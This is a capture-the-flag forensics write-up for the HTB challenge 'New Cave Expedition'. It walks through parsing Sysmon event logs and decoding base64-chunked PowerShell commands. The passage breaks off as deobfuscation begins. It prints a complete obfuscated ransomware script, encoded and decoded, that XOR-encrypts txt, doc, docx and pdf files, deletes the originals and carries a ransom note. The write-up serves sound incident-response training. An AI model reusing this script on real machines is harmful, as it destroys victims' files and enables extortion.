HTB Cyber Apocalypse - New Cave Expedition
“Rumors of a black drake terrorizing the fields of Dunlorn have spread far and wide. The village has offered a hefty bounty for its defeat. Sir Alaric and Thorin answered the call also returning with treasures from its lair. Among the retrieved items they found a map. Unfortunately it cannot be used directly because a custom encryption algorithm was probably used. Luckily it was possible to retrieve the original code that managed the encryption process. Can you investigate about what happened and retrieve the map content?”
Once the challenge downloaded, we have two multiples files. One folder named Logs containing multiple .evtx files, and a file named map.pdf.secured. Let’s try to see what file is map.pdf.secured :
exegol-forensic caveExpedition $ file map.pdf.secured
map.pdf.secured: ASCII text, with very long lines (65536), with no line terminators
The file is not recognized, so we will try to identify it by dumping the first hex of it :
caveExpedition $ xxd -d map.pdf.secured | head
00000000: 2f35 654b 6149 3373 2b53 4b30 3832 7776 /5eKaI3s+SK082wv
00000016: 6556 6966 2b65 794e 7976 6a4a 3561 4c56 eVif+eyNyvjJ5aLV
00000032: 3274 4957 7364 7a79 3272 506b 6872 3431 2tIWsdzy2rPkhr41
00000048: 2b70 534b 4161 7a45 3842 624b 3661 644f +pSKAazE8BbK6adO
00000064: 4b4e 4f71 6f6c 6e4b 3572 3543 7273 7150 KNOqolnK5r5CrsqP
00000080: 785a 7136 3361 7277 7263 7234 6f70 3251 xZq63arwrcr4op2Q
00000096: 3137 4746 5934 6a75 3970 4853 304e 714b 17GFY4ju9pHS0NqK
00000112: 5a37 6934 3368 6a64 6c71 6b6d 6774 7237 Z7i43hjdlqkmgtr7
00000128: 637a 2f4b 7861 7462 3249 6971 4736 3337 cz/Kxatb2IiqG637
00000144: 7a59 6e78 6c4c 544a 7972 6179 686f 652b zYnxlLTJyrayhoe+
The file seems to be base64 encoded, we need to decode it to retrieve the real hex of it :
exegol-forensic caveExpedition $ cat map.pdf.secured | base64 -d > map.pdf.decoded
exegol-forensic caveExpedition $ xxd -d map.pdf.decoded | head
00000000: ff97 8a68 8dec f922 b4f3 6c2f 7958 9ff9 ...h..."..l/yX..
00000016: ec8d caf8 c9e5 a2d5 dad2 16b1 dcf2 dab3 ................
00000032: e486 be35 fa94 8a01 acc4 f016 cae9 a74e ...5...........N
00000048: 28d3 aaa2 59ca e6be 42ae ca8f c59a badd (...Y...B.......
00000064: aaf0 adca f8a2 9d90 d7b1 8563 88ee f691 ...........c....
00000080: d2d0 da8a 67b8 b8de 18dd 96a9 2682 dafb ....g.......&...
00000096: 733f cac5 ab5b d888 aa1b adfb cd89 f194 s?...[..........
00000112: b4c9 cab6 b286 87be b5e7 8ab5 65c1 a282 ............e...
00000128: b4b3 eea3 c50f c39e 802c da8c da7a d39f .........,...z..
00000144: bb75 29ce 93e6 73bb 83e4 38d2 ede5 cda2 .u)...s...8.....
The idea here is to compare the known file signatures to identify our file. To do that we can follow this link.
But there is a problem, after some research, no known signatures matched. We can’t do anything with file for now, so let’s see what are the files inside Logs folder :
exegol-forensic Logs $ ls | head
Application.evtx
ForwardedEvents.evtx
HardwareEvents.evtx
Internet Explorer.evtx
Key Management Service.evtx
Microsoft-AppV-Client_Admin.evtx
Microsoft-AppV-Client_Operational.evtx
Microsoft-AppV-Client_Virtual Applications.evtx
Microsoft-Client-License-ESU_Admin.evtx
Microsoft-Client-License-Flexible-Platform_Admin.evtx
Among all these evtx files, one seems really interesting. It’s a sysmon log file :
exegol-forensic Logs $ ls | grep Sysmon
Microsoft-Windows-Sysmon_Operational.evtx
Sysmon is a sysinternal tool from Windows, which allows a machine to generate more logs. It works with a .xml config file where we specify what kind of logs we want to generate.
As you may know, .evtx files work with Windows machines, we need to find a way to read them. We can do that with a tool called python-evtx which can be installed using pipx :
pipx install python-evtx
Once installed, we can use evtx_dump.py to retrieve the content of our log file as xml :
exegol-forensic Logs $ evtx_dump.py Microsoft-Windows-Sysmon_Operational.evtx > sysmon.xml
To see the structure of each entry inside our file, let’s print the first entry :
Logs $ strings sysmon.xml | head -n 30
<?xml version="1.1" encoding="utf-8" standalone="yes" ?>
<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"></Provider>
<EventID Qualifiers="">1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2025-01-28 10:31:13.890205"></TimeCreated>
<EventRecordID>42964</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="2516" ThreadID="1060"></Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>Workstation5678</Computer>
<Security UserID="S-1-5-18"></Security>
</System>
<EventData><Data Name="RuleName">-</Data>
<Data Name="UtcTime">2025-01-28 10:31:13.888</Data>
<Data Name="ProcessGuid">{9ef5b0ce-b1f1-6798-ea03-000000001600}</Data>
<Data Name="ProcessId">5844</Data>
<Data Name="Image">C:\Windows\System32\wevtutil.exe</Data>
<Data Name="FileVersion">10.0.19041.3636 (WinBuild.160101.0800)</Data>
<Data Name="Description">Eventing Command Line Utility</Data>
<Data Name="Product">Microsoft® Windows® Operating System</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">wevtutil.exe</Data>
<Data Name="CommandLine">"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-Driver/Performance</Data>
<Data Name="CurrentDirectory">C:\Windows\system32\</Data>
<Data Name="User">WORKSTATION5678\developer56546756</Data>
It looks really interesting, we know that the name of the machine where the logs were collected is WORKSTATION5678 and we also know the one username which is developer56546756. But here, one thing should be obvious, we can see a parameter named CommandLine which contains the command executed. Let’s make a grep on it (since there is a bunch of commands, I printed only the interesting ones) :
Logs $ strings sysmon.xml | grep -i Commandline | grep -i nonewline
<Data Name="CommandLine">powershell -c "'JGszNFZtID0gIktpNTBlSFFnS2k1a2IyTWdLaTVrYjJONElDb3VjR1JtIg0KJG03OFZvID0gIkxTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFFwWlQxVlNJRVpKVEVWVElFaEJWa1VnUWtWRlRpQkZUa05TV1ZCVVJVUWdRbGtnUVNCU1FVNVRUMDFYUVZKRkNpb2dWMmhoZENCb1lYQndaVzVsWkQ4S1RXOXpkQ0J2WmlCNWIzVnlJR1pwYkdWeklHRnlaU0J1YnlCc2IyNW5aWElnWVdOalpYTnphV0pzWlNCaVpXTmhkWE5sSUhSb1pYa2dhR0YyWlNCaVpXVnVJR1Z1WTNKNWNIUmxaQzRnUkc4Z2JtOTBJ' | Out-File -Encoding ascii -FilePath b -NoNewline"</Data>
<Data Name="CommandLine">powershell -c "'SGRoYzNSbElIbHZkWElnZEdsdFpTQjBjbmxwYm1jZ2RHOGdabWx1WkNCaElIZGhlU0IwYnlCa1pXTnllWEIwSUhSb1pXMDdJR2wwSUdseklHbHRjRzl6YzJsaWJHVWdkMmwwYUc5MWRDQnZkWElnYUdWc2NDNEtLaUJJYjNjZ2RHOGdjbVZqYjNabGNpQnRlU0JtYVd4bGN6OEtVbVZqYjNabGNtbHVaeUI1YjNWeUlHWnBiR1Z6SUdseklERXdNQ1VnWjNWaGNtRnVkR1ZsWkNCcFppQjViM1VnWm05c2JHOTNJRzkxY2lCcGJuTjBjblZqZEdsdmJuTXVDaW9nU1hNZ2RHaGxjbVVnWVNCa1pXRmtiR2x1WlQ4S1QyWWdZMjkxY25ObExDQjBhR1Z5WlNCcGN5NGdXVzkxSUdoaGRtVWdkR1Z1SUdSaGVYTWdiR1ZtZEM0Z1JHOGdibTkwSUcxcGMzTWdkR2hwY3lCa1pXRmtiR2x1WlM0S0xTMHRM' | Out-File -Encoding ascii -FilePath b -Append -NoNewline"</Data>
<Data Name="CommandLine">powershell -c "'UzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFFvPSINCiRhNTNWYSA9ICJOWGh6UjA5aWFraFJhVkJCUjJSNlRHZENSV1ZKT0hVd1dWTktjVGMyUldsNWRXWTRkMEZTVXpkeFluUlFORzUwVVZrMU1IbElPR1I2UzFwbFEwRnpXZz09Ig0KJGI2NFZiID0gIm4ybW1YYVd5NXBMNGtwTldyN2JjZ0VLeE1lVXg1ME1KIg0KDQokZTkwVmcgPSBAe30NCiRmMTJWaCA9IEB7fQ0KDQpGb3IgKCR4ID0gNjU7ICR4IC1sZSA5MDsgJHgrKykgew0KICAgICRlOTBWZ1soW2NoYXJdJHgpXSA9IGlmKCR4IC1lcSA5MCkgeyBb' | Out-File -Encoding ascii -FilePath b -Append -NoNewline"</Data>
<Data Name="CommandLine">powershell -c "'Y2hhcl02NSB9IGVsc2UgeyBbY2hhcl0oJHggKyAxKSB9DQp9DQoNCmZ1bmN0aW9uIG45MFZwIHsNCiAgICAgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbTc4Vm8pKQ0KfQ0KDQpmdW5jdGlvbiBsNTZWbiB7DQogICAgcmV0dXJuIChhMTJWYyAkazM0Vm0pLlNwbGl0KCIgIikNCn0NCg0KRm9yICgkeCA9IDk3OyAkeCAtbGUgMTIyOyAkeCsrKSB7DQogICAgJGU5MFZnWyhbY2hhcl0keCldID0gaWYoJHggLWVxIDEyMikgeyBbY2hhcl05NyB9IGVsc2UgeyBbY2hhcl0oJHggKyAxKSB9DQp9DQoNCmZ1bmN0aW9uIGExMlZjIHsNCiAgICBwYXJhbShbc3RyaW5nXSRhMzRWZCkNCiAgICByZXR1' | Out-File -Encoding ascii -FilePath b -Append -NoNewline"</Data>
<Data Name="CommandLine">powershell -c "'cm4gW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGEzNFZkKSkNCn0NCg0KJGM1NlZlID0gYTEyVmMgJGE1M1ZhDQokZDc4VmYgPSBhMTJWYyAkYjY0VmINCg0KRm9yICgkeCA9IDQ4OyAkeCAtbGUgNTc7ICR4KyspIHsNCiAgICAkZTkwVmdbKFtjaGFyXSR4KV0gPSBpZigkeCAtZXEgNTcpIHsgW2NoYXJdNDggfSBlbHNlIHsgW2NoYXJdKCR4ICsgMSkgfQ0KfQ0KDQokZTkwVmcuR2V0RW51bWVyYXRvcigpIHwgRm9yRWFjaC1PYmplY3Qgew0KICAgICRmMTJWaFskXy5WYWx1ZV0gPSAkXy5LZXkNCn0NCg0KZnVuY3Rpb24gbDM0Vm4gew0KICAgIHBhcmFtKFtieXRlW11dJG01NlZvLCBbYnl0ZVtdXSRuNzhWcCwgW2J5' | Out-File -Encoding ascii -FilePath b -Append -NoNewline"</Data>
<Data Name="CommandLine">powershell -c "'dGVbXV0kbzkwVnEpDQogICAgJHAxMlZyID0gW2J5dGVbXV06Om5ldygkbTU2Vm8uTGVuZ3RoKQ0KICAgIGZvciAoJHggPSAwOyAkeCAtbHQgJG01NlZvLkxlbmd0aDsgJHgrKykgew0KICAgICAgICAkcTM0VnMgPSAkbjc4VnBbJHggJSAkbjc4VnAuTGVuZ3RoXQ0KICAgICAgICAkcjU2VnQgPSAkbzkwVnFbJHggJSAkbzkwVnEuTGVuZ3RoXQ0KICAgICAgICAkcDEyVnJbJHhdID0gJG01NlZvWyR4XSAtYnhvciAkcTM0VnMgLWJ4b3IgJHI1NlZ0DQogICAgfQ0KICAgIHJldHVybiAkcDEyVnINCn0NCg0KZnVuY3Rpb24gczc4VnUgew0KICAgIHBhcmFtKFtieXRlW11dJHQ5MFZ2LCBbc3RyaW5nXSR1MTJWdywgW3N0cmluZ10kdjM0VngpDQoNCiAgICBpZiAoJHQ5MFZ2IC1lcSAk' | Out-File -Encoding ascii -FilePath b -Append -NoNewline"</Data>
<Data Name="CommandLine">powershell -c "'bnVsbCAtb3IgJHQ5MFZ2Lkxlbmd0aCAtZXEgMCkgew0KICAgICAgICByZXR1cm4gJG51bGwNCiAgICB9DQoNCiAgICAkeTkwVmEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCR1MTJWdykNCiAgICAkejEyVmIgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCR2MzRWeCkNCiAgICAkYTM0VmMgPSBsMzRWbiAkdDkwVnYgJHk5MFZhICR6MTJWYg0KDQogICAgcmV0dXJuIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoJGEzNFZjKQ0KfQ0KDQpmdW5jdGlvbiBvMTJWcSB7DQogICAgcGFyYW0oW3N3aXRjaF0kcDM0VnIpDQoNCiAgICB0cnkgew0KICAgICAgICBpZiAoJHAzNFZyKSB7DQogICAgICAgICAgICBmb3JlYWNoICgkcTU2' | Out-File -Encoding ascii -FilePath b -Append -NoNewline"</Data>
<Data Name="CommandLine">powershell -c "'VnMgaW4gbDU2Vm4pIHsNCiAgICAgICAgICAgICAgICAkZDM0VnAgPSAiZGNhMDFhcTIvIg0KICAgICAgICAgICAgICAgIGlmIChUZXN0LVBhdGggJGQzNFZwKSB7DQogICAgICAgICAgICAgICAgICAgIEdldC1DaGlsZEl0ZW0gLVBhdGggJGQzNFZwIC1SZWN1cnNlIC1FcnJvckFjdGlvbiBTdG9wIHwNCiAgICAgICAgICAgICAgICAgICAgICAgIFdoZXJlLU9iamVjdCB7ICRfLkV4dGVuc2lvbiAtbWF0Y2ggIl5cLiRxNTZWcyQiIH0gfA0KICAgICAgICAgICAgICAgICAgICAgICAgRm9yRWFjaC1PYmplY3Qgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICRyNzhWdCA9ICRfLkZ1bGxOYW1lDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKFRlc3QtUGF0aCAk' | Out-File -Encoding ascii -FilePath b -Append -NoNewline"</Data>
<Data Name="CommandLine">powershell -c "'cjc4VnQpIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHM5MFZ1ID0gW0lPLkZpbGVdOjpSZWFkQWxsQnl0ZXMoJHI3OFZ0KQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkdDEyVnYgPSBzNzhWdSAkczkwVnUgJGM1NlZlICRkNzhWZg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBbSU8uRmlsZV06OldyaXRlQWxsVGV4dCgiJHI3OFZ0LnNlY3VyZWQiLCAkdDEyVnYpDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJlbW92ZS1JdGVtICRyNzhWdCAtRm9yY2UNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAg' | Out-File -Encoding ascii -FilePath b -Append -NoNewline"</Data>
<Data Name="CommandLine">powershell -c "'fQ0KICAgICAgICB9DQogICAgfQ0KICAgIGNhdGNoIHt9DQp9DQoNCmlmICgkZW52OlVTRVJOQU1FIC1lcSAiZGV2ZWxvcGVyNTY1NDY3NTYiIC1hbmQgJGVudjpDT01QVVRFUk5BTUUgLWVxICJXb3Jrc3RhdGlvbjU2NzgiKSB7DQogICAgbzEyVnEgLXAzNFZyDQogICAgbjkwVnANCn0NCg0K' | Out-File -Encoding ascii -FilePath b -Append -NoNewline"</Data>
Here we can see that base64 encoded datas were added to a file. it looks really suspect. As all the datas were added together, we can decode all the data together :
exegol-forensic Logs $ echo -ne 'JGszNFZtID0gIktpNTBlSFFnS2k1a2IyTWdLaTVrYjJONElDb3VjR1JtIg0KJG03OFZvID0gIkxTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFFwWlQxVlNJRVpKVEVWVElFaEJWa1VnUWtWRlRpQkZUa05TV1ZCVVJVUWdRbGtnUVNCU1FVNVRUMDFYUVZKRkNpb2dWMmhoZENCb1lYQndaVzVsWkQ4S1RXOXpkQ0J2WmlCNWIzVnlJR1pwYkdWeklHRnlaU0J1YnlCc2IyNW5aWElnWVdOalpYTnphV0pzWlNCaVpXTmhkWE5sSUhSb1pYa2dhR0YyWlNCaVpXVnVJR1Z1WTNKNWNIUmxaQzRnUkc4Z2JtOTBJSGRoYzNSbElIbHZkWElnZEdsdFpTQjBjbmxwYm1jZ2RHOGdabWx1WkNCaElIZGhlU0IwYnlCa1pXTnllWEIwSUhSb1pXMDdJR2wwSUdseklHbHRjRzl6YzJsaWJHVWdkMmwwYUc5MWRDQnZkWElnYUdWc2NDNEtLaUJJYjNjZ2RHOGdjbVZqYjNabGNpQnRlU0JtYVd4bGN6OEtVbVZqYjNabGNtbHVaeUI1YjNWeUlHWnBiR1Z6SUdseklERXdNQ1VnWjNWaGNtRnVkR1ZsWkNCcFppQjViM1VnWm05c2JHOTNJRzkxY2lCcGJuTjBjblZqZEdsdmJuTXVDaW9nU1hNZ2RHaGxjbVVnWVNCa1pXRmtiR2x1WlQ4S1QyWWdZMjkxY25ObExDQjBhR1Z5WlNCcGN5NGdXVzkxSUdoaGRtVWdkR1Z1SUdSaGVYTWdiR1ZtZEM0Z1JHOGdibTkwSUcxcGMzTWdkR2hwY3lCa1pXRmtiR2x1WlM0S0xTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFFvPSINCiRhNTNWYSA9ICJOWGh6UjA5aWFraFJhVkJCUjJSNlRHZENSV1ZKT0hVd1dWTktjVGMyUldsNWRXWTRkMEZTVXpkeFluUlFORzUwVVZrMU1IbElPR1I2UzFwbFEwRnpXZz09Ig0KJGI2NFZiID0gIm4ybW1YYVd5NXBMNGtwTldyN2JjZ0VLeE1lVXg1ME1KIg0KDQokZTkwVmcgPSBAe30NCiRmMTJWaCA9IEB7fQ0KDQpGb3IgKCR4ID0gNjU7ICR4IC1sZSA5MDsgJHgrKykgew0KICAgICRlOTBWZ1soW2NoYXJdJHgpXSA9IGlmKCR4IC1lcSA5MCkgeyBbY2hhcl02NSB9IGVsc2UgeyBbY2hhcl0oJHggKyAxKSB9DQp9DQoNCmZ1bmN0aW9uIG45MFZwIHsNCiAgICAgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbTc4Vm8pKQ0KfQ0KDQpmdW5jdGlvbiBsNTZWbiB7DQogICAgcmV0dXJuIChhMTJWYyAkazM0Vm0pLlNwbGl0KCIgIikNCn0NCg0KRm9yICgkeCA9IDk3OyAkeCAtbGUgMTIyOyAkeCsrKSB7DQogICAgJGU5MFZnWyhbY2hhcl0keCldID0gaWYoJHggLWVxIDEyMikgeyBbY2hhcl05NyB9IGVsc2UgeyBbY2hhcl0oJHggKyAxKSB9DQp9DQoNCmZ1bmN0aW9uIGExMlZjIHsNCiAgICBwYXJhbShbc3RyaW5nXSRhMzRWZCkNCiAgICByZXR1cm4gW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGEzNFZkKSkNCn0NCg0KJGM1NlZlID0gYTEyVmMgJGE1M1ZhDQokZDc4VmYgPSBhMTJWYyAkYjY0VmINCg0KRm9yICgkeCA9IDQ4OyAkeCAtbGUgNTc7ICR4KyspIHsNCiAgICAkZTkwVmdbKFtjaGFyXSR4KV0gPSBpZigkeCAtZXEgNTcpIHsgW2NoYXJdNDggfSBlbHNlIHsgW2NoYXJdKCR4ICsgMSkgfQ0KfQ0KDQokZTkwVmcuR2V0RW51bWVyYXRvcigpIHwgRm9yRWFjaC1PYmplY3Qgew0KICAgICRmMTJWaFskXy5WYWx1ZV0gPSAkXy5LZXkNCn0NCg0KZnVuY3Rpb24gbDM0Vm4gew0KICAgIHBhcmFtKFtieXRlW11dJG01NlZvLCBbYnl0ZVtdXSRuNzhWcCwgW2J5dGVbXV0kbzkwVnEpDQogICAgJHAxMlZyID0gW2J5dGVbXV06Om5ldygkbTU2Vm8uTGVuZ3RoKQ0KICAgIGZvciAoJHggPSAwOyAkeCAtbHQgJG01NlZvLkxlbmd0aDsgJHgrKykgew0KICAgICAgICAkcTM0VnMgPSAkbjc4VnBbJHggJSAkbjc4VnAuTGVuZ3RoXQ0KICAgICAgICAkcjU2VnQgPSAkbzkwVnFbJHggJSAkbzkwVnEuTGVuZ3RoXQ0KICAgICAgICAkcDEyVnJbJHhdID0gJG01NlZvWyR4XSAtYnhvciAkcTM0VnMgLWJ4b3IgJHI1NlZ0DQogICAgfQ0KICAgIHJldHVybiAkcDEyVnINCn0NCg0KZnVuY3Rpb24gczc4VnUgew0KICAgIHBhcmFtKFtieXRlW11dJHQ5MFZ2LCBbc3RyaW5nXSR1MTJWdywgW3N0cmluZ10kdjM0VngpDQoNCiAgICBpZiAoJHQ5MFZ2IC1lcSAkbnVsbCAtb3IgJHQ5MFZ2Lkxlbmd0aCAtZXEgMCkgew0KICAgICAgICByZXR1cm4gJG51bGwNCiAgICB9DQoNCiAgICAkeTkwVmEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCR1MTJWdykNCiAgICAkejEyVmIgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCR2MzRWeCkNCiAgICAkYTM0VmMgPSBsMzRWbiAkdDkwVnYgJHk5MFZhICR6MTJWYg0KDQogICAgcmV0dXJuIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoJGEzNFZjKQ0KfQ0KDQpmdW5jdGlvbiBvMTJWcSB7DQogICAgcGFyYW0oW3N3aXRjaF0kcDM0VnIpDQoNCiAgICB0cnkgew0KICAgICAgICBpZiAoJHAzNFZyKSB7DQogICAgICAgICAgICBmb3JlYWNoICgkcTU2VnMgaW4gbDU2Vm4pIHsNCiAgICAgICAgICAgICAgICAkZDM0VnAgPSAiZGNhMDFhcTIvIg0KICAgICAgICAgICAgICAgIGlmIChUZXN0LVBhdGggJGQzNFZwKSB7DQogICAgICAgICAgICAgICAgICAgIEdldC1DaGlsZEl0ZW0gLVBhdGggJGQzNFZwIC1SZWN1cnNlIC1FcnJvckFjdGlvbiBTdG9wIHwNCiAgICAgICAgICAgICAgICAgICAgICAgIFdoZXJlLU9iamVjdCB7ICRfLkV4dGVuc2lvbiAtbWF0Y2ggIl5cLiRxNTZWcyQiIH0gfA0KICAgICAgICAgICAgICAgICAgICAgICAgRm9yRWFjaC1PYmplY3Qgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICRyNzhWdCA9ICRfLkZ1bGxOYW1lDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKFRlc3QtUGF0aCAkcjc4VnQpIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHM5MFZ1ID0gW0lPLkZpbGVdOjpSZWFkQWxsQnl0ZXMoJHI3OFZ0KQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkdDEyVnYgPSBzNzhWdSAkczkwVnUgJGM1NlZlICRkNzhWZg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBbSU8uRmlsZV06OldyaXRlQWxsVGV4dCgiJHI3OFZ0LnNlY3VyZWQiLCAkdDEyVnYpDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJlbW92ZS1JdGVtICRyNzhWdCAtRm9yY2UNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgfQ0KICAgIGNhdGNoIHt9DQp9DQoNCmlmICgkZW52OlVTRVJOQU1FIC1lcSAiZGV2ZWxvcGVyNTY1NDY3NTYiIC1hbmQgJGVudjpDT01QVVRFUk5BTUUgLWVxICJXb3Jrc3RhdGlvbjU2NzgiKSB7DQogICAgbzEyVnEgLXAzNFZyDQogICAgbjkwVnANCn0NCg0K' | base64 -d > suspect.file
It’s a powershell script that seems to be obfuscated. We need to understand what happened so our work is to deobfuscate it :
$k34Vm = "Ki50eHQgKi5kb2MgKi5kb2N4ICoucGRm"
$m78Vo = "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgQlkgQSBSQU5TT01XQVJFCiogV2hhdCBoYXBwZW5lZD8KTW9zdCBvZiB5b3VyIGZpbGVzIGFyZSBubyBsb25nZXIgYWNjZXNzaWJsZSBiZWNhdXNlIHRoZXkgaGF2ZSBiZWVuIGVuY3J5cHRlZC4gRG8gbm90IHdhc3RlIHlvdXIgdGltZSB0cnlpbmcgdG8gZmluZCBhIHdheSB0byBkZWNyeXB0IHRoZW07IGl0IGlzIGltcG9zc2libGUgd2l0aG91dCBvdXIgaGVscC4KKiBIb3cgdG8gcmVjb3ZlciBteSBmaWxlcz8KUmVjb3ZlcmluZyB5b3VyIGZpbGVzIGlzIDEwMCUgZ3VhcmFudGVlZCBpZiB5b3UgZm9sbG93IG91ciBpbnN0cnVjdGlvbnMuCiogSXMgdGhlcmUgYSBkZWFkbGluZT8KT2YgY291cnNlLCB0aGVyZSBpcy4gWW91IGhhdmUgdGVuIGRheXMgbGVmdC4gRG8gbm90IG1pc3MgdGhpcyBkZWFkbGluZS4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQo="
$a53Va = "NXhzR09iakhRaVBBR2R6TGdCRWVJOHUwWVNKcTc2RWl5dWY4d0FSUzdxYnRQNG50UVk1MHlIOGR6S1plQ0FzWg=="
$b64Vb = "n2mmXaWy5pL4kpNWr7bcgEKxMeUx50MJ"
$e90Vg = @{}
$f12Vh = @{}
For ($x = 65; $x -le 90; $x++) {
$e90Vg[([char]$x)] = if($x -eq 90) { [char]65 } else { [char]($x + 1) }
function n90Vp {
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($m78Vo))
function l56Vn {
return (a12Vc $k34Vm).Split(" ")
For ($x = 97; $x -le 122; $x++) {
$e90Vg[([char]$x)] = if($x -eq 122) { [char]97 } else { [char]($x + 1) }
function a12Vc {
param([string]$a34Vd)
return [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a34Vd))
$c56Ve = a12Vc $a53Va
$d78Vf = a12Vc $b64Vb
For ($x = 48; $x -le 57; $x++) {
$e90Vg[([char]$x)] = if($x -eq 57) { [char]48 } else { [char]($x + 1) }
$e90Vg.GetEnumerator() | ForEach-Object {
$f12Vh[$_.Value] = $_.Key
function l34Vn {
param([byte[]]$m56Vo, [byte[]]$n78Vp, [byte[]]$o90Vq)
$p12Vr = [byte[]]::new($m56Vo.Length)
for ($x = 0; $x -lt $m56Vo.Length; $x++) {
$q34Vs = $n78Vp[$x % $n78Vp.Length]
$r56Vt = $o90Vq[$x % $o90Vq.Length]
$p12Vr[$x] = $m56Vo[$x] -bxor $q34Vs -bxor $r56Vt
}
return $p12Vr
function s78Vu {
param([byte[]]$t90Vv, [string]$u12Vw, [string]$v34Vx)
if ($t90Vv -eq $null -or $t90Vv.Length -eq 0) {
return $null
}
$y90Va = [System.Text.Encoding]::UTF8.GetBytes($u12Vw)
$z12Vb = [System.Text.Encoding]::UTF8.GetBytes($v34Vx)
$a34Vc = l34Vn $t90Vv $y90Va $z12Vb
return [Convert]::ToBase64String($a34Vc)
function o12Vq {
param([switch]$p34Vr)
try {
if ($p34Vr) {
foreach ($q56Vs in l56Vn) {
$d34Vp = "dca01aq2/"
if (Test-Path $d34Vp) {
Get-ChildItem -Path $d34Vp -Recurse -ErrorAction Stop |
Where-Object { $_.Extension -match "^\.$q56Vs$" } |
ForEach-Object {
$r78Vt = $_.FullName
if (Test-Path $r78Vt) {
$s90Vu = [IO.File]::ReadAllBytes($r78Vt)
$t12Vv = s78Vu $s90Vu $c56Ve $d78Vf
[IO.File]::WriteAllText("$r78Vt.secured", $t12Vv)
Remove-Item $r78Vt -Force
}
}
}
}
}
}
catch {}
if ($env:USERNAME -eq "developer56546756" -and $env:COMPUTERNAME -eq "Workstation5678") {
o12Vq -p34Vr
n90Vp
To understand what the script is doing, the methodology here is to rename each functions, variables, step by step, until we have a good understand of it.
Let’s begin with the first two variables which are base64 encoded. If we decode them we obtain the following text :
